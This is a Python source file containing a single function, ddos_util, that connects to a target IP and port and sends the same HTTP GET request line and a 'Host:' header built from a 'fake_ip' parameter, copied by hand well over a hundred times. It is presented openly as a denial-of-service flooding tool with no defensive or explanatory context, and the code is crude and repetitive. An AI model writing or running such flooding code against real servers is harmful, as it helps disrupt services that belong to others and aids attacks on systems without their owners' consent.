import socket

def ddos_util(IP, PORT, fake_ip):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (IP, PORT))
    s.sendto(("GET /" + IP + " HTTP/1.1\r\n").encode('ascii'), (IP, PORT))
